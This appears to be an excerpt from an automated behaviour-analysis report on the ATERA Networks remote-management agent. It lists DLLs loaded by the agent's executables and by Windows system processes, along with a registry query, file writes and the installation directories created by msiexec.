Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptnet.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wscapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winsta.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: napinsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wshbth.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\cscript.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: smphost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mispace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sxshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsp_fs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsp_sr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsp_health.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: healthapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Section loaded: winnsi.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

File written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

